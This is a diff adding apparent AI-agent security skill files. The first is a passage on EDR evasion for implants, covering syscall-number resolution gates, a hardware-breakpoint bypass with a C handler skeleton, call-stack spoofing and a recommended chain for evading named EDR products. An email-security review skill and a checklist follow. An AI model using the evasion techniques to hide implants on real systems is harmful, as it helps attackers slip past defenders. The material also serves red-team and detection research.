+ - 假设 ntdll 未被 hook
198
+ - 在 implant 启动时遍历 ntdll 的 `Nt*` 导出,从前 4 字节 `mov eax, <SSN>` 提取 SSN
199
+ - 优点:不写死 SSN,跨 Windows 版本通用
200
+ - 缺点:如果 ntdll 已经被 hook(第一字节变成 jmp),提取失败
201
+
202
+ ### Halo's Gate
203
+
204
+ - 修复 Hell's Gate 的 hook 问题
205
+ - 如果发现某个函数被 hook(不是标准 prologue),就**向上 / 向下扫描 ±N 个函数**
206
+ - 利用 ntdll 中 `Nt*` 函数 SSN 是连续递增的事实,从邻居反推被 hook 函数的 SSN
207
+
208
+ ```text
209
+ 正常情况:
210
+ NtAllocateVirtualMemory SSN = 0x18
211
+ NtQueryInformationProcess SSN = 0x19
212
+ NtProtectVirtualMemory SSN = 0x50
213
+
214
+ 如果 NtAllocateVirtualMemory 被 hook 看不到 SSN,看邻居:
215
+ 上一个未 hook 的导出 SSN = 0x17
216
+ 下一个未 hook 的导出 SSN = 0x19
217
+ → NtAllocateVirtualMemory SSN = 0x18
218
+ ```
219
+
220
+ ### Tartarus Gate
221
+
222
+ - 进一步处理 **Hook 改了 SSN 但保留了 syscall 指令** 的高级 hook
223
+ - 同时校验 SSN 与 syscall;ret gadget 地址
224
+ - 三者结合提供最稳定的 indirect syscall 基础
225
+
226
+ ### 参考实现位置(在自举的 git clone 后)
227
+
228
+ ```text
229
+ Hell's Gate: am0nsec/HellsGate
230
+ Halo's Gate: am0nsec/HellsGate (含 fallback 逻辑) / SafeBreach-Labs/HalosGate-PoC
231
+ Tartarus Gate: trickster0/TartarusGate
232
+ SysWhispers3: 集成了三者
233
+ ```
234
+
235
+ ## 5. Hardware Breakpoint Blindside
236
+
237
+ ### 原理
238
+
239
+ 利用调试寄存器 `DR0-DR3` 在 EDR hook trampoline 的入口设硬件断点;
240
+ 设置 VEH (Vectored Exception Handler) 在断点命中时把 RIP **直接改到 hook trampoline 后面**,
241
+ 跳过 EDR 的检测代码,落到 ntdll 真正的 syscall 段。
242
+
243
+ ### 优势
244
+
245
+ - 不需要写 ntdll 内存(无 `NtProtectVirtualMemory` 告警)
246
+ - 不需要 unhook(hook 还在那,只是被绕过)
247
+ - ETW-TI 看不到内存修改
248
+
249
+ ### 实现骨架
250
+
251
+ ```c
252
+ // 1. AddVectoredExceptionHandler
253
+ // 2. 在每个被 hook 函数入口设 DR0..DR3 (最多 4 个,配合 single-step rotate)
254
+ // 3. SetThreadContext(thread, &ctx) 写 DRx
255
+ // 4. 当 EDR hook trampoline 触发硬件断点 -> VEH 接管
256
+ // 5. VEH 把 EXCEPTION_POINTERS->ContextRecord->Rip 改到 ntdll 的合法 syscall;ret
257
+ // 6. ContinueExecution
258
+
259
+ LONG CALLBACK Blindside(EXCEPTION_POINTERS* ep) {
260
+ if (ep->ExceptionRecord->ExceptionCode == EXCEPTION_SINGLE_STEP) {
261
+ DWORD64 rip = ep->ContextRecord->Rip;
262
+ if (rip == g_hookedNtAllocVM) {
263
+ // SSN 已经在 eax;R10 = RCX;跳到 ntdll 的 syscall;ret
264
+ ep->ContextRecord->Rip = (DWORD64)g_syscallGadget;
265
+ return EXCEPTION_CONTINUE_EXECUTION;
266
+ }
267
+ }
268
+ return EXCEPTION_CONTINUE_SEARCH;
269
+ }
270
+ ```
271
+
272
+ ### 限制
273
+
274
+ - 每个线程独立 DRx → 多线程要分别设
275
+ - 一些 EDR 已经 hook `NtSetContextThread` / `NtGetContextThread`,要先用前面的技术绕过它
276
+ - Win11 22H2+ 引入 HVCI / 一些反调试缓解可能干扰
277
+
278
+ ## 6. Call Stack Spoofing
279
+
280
+ ### 问题
281
+
282
+ 现代 EDR 在 `NtAllocateVirtualMemory` / `NtCreateThreadEx` 等 syscall 内核入口处会调用 `RtlCaptureStackBackTrace`,
283
+ 拿到完整调用栈上报。implant 的栈会出现 **non-image-backed memory** 帧 → 高置信告警。
284
+
285
+ ### 方案 A:CallStackSpoofer(William Burgess)
286
+
287
+ 实现思路:
288
+
289
+ 1. 在 syscall 前 swap 当前线程栈 → 一个伪造的合法栈
290
+ 2. 伪造的栈帧填充诸如 `kernel32!BaseThreadInitThunk → ntdll!RtlUserThreadStart` 这种全合法返回链
291
+ 3. syscall 返回后 swap 回真实栈
292
+
293
+ ### 方案 B:SilentMoonwalk
294
+
295
+ 更激进,使用 desynchronized stack:
296
+
297
+ ```text
298
+ 执行流程:
299
+ implant 代码 → 自定义 trampoline (修改 RSP / RBP / 栈内容)
300
+
301
+ syscall (RtlCaptureStackBackTrace 看到伪造栈)
302
+
303
+ trampoline 还原 → 继续 implant 代码
304
+ ```
305
+
306
+ 关键是 unwinding:让 `RtlVirtualUnwind` 走入伪造的 `RUNTIME_FUNCTION` / `UNWIND_INFO` 链。
307
+
308
+ ### 实战 OPSEC 建议
309
+
310
+ - call stack spoof + indirect syscall + ETW patch 是当前过 CrowdStrike / SentinelOne 比较稳的组合
311
+ - 在 sleep 阶段也要 spoof,单纯执行时 spoof 是不够的(EDR 会定期采样)
312
+
313
+ ## 7. 技术选型对照表
314
+
315
+ | 技术 | 对抗 | 复杂度 | 当前有效性 | ATT&CK |
316
+ |------|------|--------|------------|--------|
317
+ | Peruns Fart | 用户态 hook | 低 | 中(易被 ETW 抓) | T1562.001 |
318
+ | Direct syscall (SysWhispers) | 用户态 hook | 低 | 低-中(kernel 看 RIP 在 implant) | T1106 / T1562.001 |
319
+ | Indirect syscall (jumper) | 用户态 hook + kernel RIP 检测 | 中 | 中-高 | T1106 |
320
+ | Hell's / Halo's / Tartarus | SSN 解析 | 中 | 高(基础设施) | T1027 |
321
+ | HWBP Blindside | hook + 无写操作 | 高 | 高 | T1562.001 |
322
+ | CallStackSpoofer / SilentMoonwalk | call stack telemetry | 高 | 高 | T1564 |
323
+
324
+ 实战推荐链:**Halo's Gate + indirect syscall + CallStackSpoofer + ETW patch**。
325
+
326
+ ## 参考资料
327
+
328
+ - SysWhispers3:<https://github.com/klezVirus/SysWhispers3>
329
+ - Hell's Gate / Halo's Gate POC:<https://github.com/am0nsec/HellsGate>、<https://github.com/SafeBreach-Labs/HalosGate-PoC>
330
+ - Tartarus Gate:<https://github.com/trickster0/TartarusGate>
331
+ - CallStackSpoofer:<https://github.com/WithSecureLabs/CallStackSpoofer>
332
+ - SilentMoonwalk:<https://github.com/klezVirus/SilentMoonwalk>
333
+ - Blindside(hardware breakpoint):<https://www.cyberark.com/resources/threat-research-blog/blindside-a-new-technique-for-edr-evasion-with-hardware-breakpoints>
334
+ - MITRE T1562.001:<https://attack.mitre.org/techniques/T1562/001/>
335
+
336
+ ## 路由回调
337
+
338
+ unhook 仅是绕过的一半,另一半是 telemetry 失明:进入 `references/telemetry-blinding.md`。
@@ -0,0 +1,81 @@
1
+ ---
2
+ name: email-security
3
+ description: "Authorized email security review: phishing analysis, SPF/DKIM/DMARC header authentication, BEC pattern investigation, and mailbox token abuse research."
4
+ risk: offensive
5
+ source: "https://github.com/zhaoxuya520/reverse-skill"
6
+ source_repo: "zhaoxuya520/reverse-skill"
7
+ source_type: community
8
+ date_added: "2026-08-25"
9
+ license: "MIT"
10
+ license_source: "https://github.com/zhaoxuya520/reverse-skill/blob/main/LICENSE"
11
+ ---
12
+ > **⚠️ AUTHORIZED USE ONLY**
13
+ > This skill is for educational purposes or authorized security assessments only.
14
+ > You must have explicit, written permission from the system owner before using this tool.
15
+ > Misuse of this tool is illegal and strictly prohibited.
16
+
17
+ > **Mandatory confirmation gate**
18
+ > Before running any command that probes, exploits, changes, persists on, extracts data from, or attempts credential access against a target:
19
+ > 1. Ask the user to state the exact target URL, IP, account, or resource.
20
+ > 2. Ask the user to confirm written authorization and the permitted scope.
21
+ > 3. Show the exact command(s) and explain their expected effect.
22
+ > 4. Wait for explicit confirmation in the current conversation.
23
+ >
24
+ > Without that confirmation, remain read-only and provide defensive guidance only. Prefer a sandbox, disposable VM, or controlled lab.
25
+
26
+ # Email Security & Phishing Analysis
27
+ ## When to Use
28
+
29
+ - Analyzing suspicious messages or domain spoofing exposure.
30
+ - Validating a domain's email authentication posture.
31
+
32
+
33
+ ## 适用场景
34
+
35
+ - 钓鱼邮件拆解与 IOC
36
+ - SPF/DKIM/DMARC 配置评估
37
+ - BEC 商务邮件欺诈模式
38
+ - OAuth 应用钓鱼 / 邮箱令牌滥用(联合 llm/cloud 身份)
39
+ - 安全意识演练设计(授权)
40
+
41
+ ## 工作流
42
+
43
+ ```text
44
+ □ 完整原始头:Received 链、From/Return-Path 一致性
45
+ □ SPF/DKIM/DMARC 对齐结果
46
+ □ URL 沙箱与附件静态(联合 malware-analysis)
47
+ □ 仿冒品牌与回复地址差异
48
+ □ 租户:反钓鱼策略、外部标记、MFA、OAuth app 同意
49
+ ```
50
+
51
+ ## 工具链
52
+
53
+ | 工具 | 用途 |
54
+ |------|------|
55
+ | 邮件客户端「查看源」 | 头 |
56
+ | dig/nslookup | SPF/DMARC 记录 |
57
+ | urlscan / 沙箱 | 链接与附件 |
58
+ | 租户管理中心 | 策略 |
59
+
60
+ ## 参考
61
+
62
+ - `references/email-auth-checklist.md`
63
+ - `../malware-analysis/` `../attack-chain/`(钓鱼阶段) `../windows-ad/`(令牌)
64
+
65
+ ## 路由上下文
66
+
67
+ **上游**: MASTER R36
68
+ **MUST NOT**: 未授权对第三方域群发测试钓鱼
69
+
70
+ ## 任务完成自检
71
+
72
+ - [ ] 头认证结论是否完整?
73
+ - [ ] IOC 是否可检测化(联合 threat-hunting)?
74
+ - [ ] Checklist?
75
+
76
+ ## Limitations
77
+
78
+ - Live mailbox investigation touches personal data; minimize and anonymize.
79
+ - Header analysis cannot detect compromise that leaves no mail trail.
80
+
81
+ > Adapted from [zhaoxuya520/reverse-skill](https://github.com/zhaoxuya520/reverse-skill) (MIT).
@@ -0,0 +1,8 @@
1
+ # 邮件认证清单
2
+
3
+ - [ ] SPF 记录与 -all/~all
4
+ - [ ] DKIM 选择器有效
5
+ - [ ] DMARC p= 与 rua
6
+ - [ ] 对齐(relaxed/strict)
7
+ - [ ] 显示名仿冒与回复地址
8
+ - [ ] 外发网关与中继